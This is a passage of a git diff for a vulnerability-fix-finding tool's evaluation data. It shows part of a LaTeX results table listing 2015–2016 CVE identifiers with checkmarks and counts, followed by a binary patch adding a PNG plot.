/checkmark & & & & & & & & & & & & & & & & 1 & 96 & & \\ \midrule +CVE-2015-3253 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2015-4053 & & & & & & & & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 110 & & \\ \midrule +CVE-2015-4082 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2015-4412 & /checkmark & & & & & /checkmark & /checkmark & & & & & & & & & & 1 & 112 & & \\ \midrule +CVE-2015-4619 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 104 & & \\ \midrule +CVE-2015-4706 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 80 & & \\ \midrule +CVE-2015-5081 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule +CVE-2015-5147 & /checkmark & & & & & & & & & & & & & & & & 1 & 64 & & \\ \midrule +CVE-2015-5159 & /checkmark & & & & & & & & & & & & & & & & 1 & 160 & & \\ \midrule +CVE-2015-5211 & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & & /checkmark & 1 & 54 & & \\ \midrule +CVE-2015-5253 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2015-5254 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 148 & & \\ \midrule +CVE-2015-5607 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule +CVE-2015-6748 & /checkmark & & & & & & & & & & & /checkmark & & /checkmark & & & 1 & 102 & & \\ \midrule +CVE-2015-7294 & /checkmark & & & & & /checkmark & & /checkmark & & & /checkmark & & & /checkmark & & & 1 & 150 & & \\ \midrule +CVE-2015-7314 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule +CVE-2015-7316 & /checkmark & & & & & & & & & & & & & /checkmark & & & 1 & 98 & & \\ \midrule +CVE-2015-7559 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 156 & & \\ \midrule +CVE-2015-7809 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2015-8213 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2015-8309 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 168 & & \\ \midrule +CVE-2015-8310 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 108 & & \\ \midrule +CVE-2015-8747 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 104 & & \\ \midrule +CVE-2015-8748 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2015-8814 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule +CVE-2015-8968 & /checkmark & & & & & & & & & & & & & /checkmark & & & 1 & 130 & & \\ \midrule +CVE-2015-9235 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule +CVE-2015-9243 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 154 & & \\ \midrule +CVE-2015-9251 & /checkmark & & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & /checkmark & & /checkmark & 1 & 156 & & \\ \midrule +CVE-2016-0750 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 72 & & \\ \midrule diff --git a/prospector/evaluation/data/results/plots/project-kb.png b/prospector/evaluation/data/results/plots/project-kb.png new file mode 100644 index 0000000000000000000000000000000000000000..935a19939d2920a38563fcf2b5c198ed097eb382 GIT binary patch literal 159194 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%0AAsV;jtV2991Abu3M`1 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 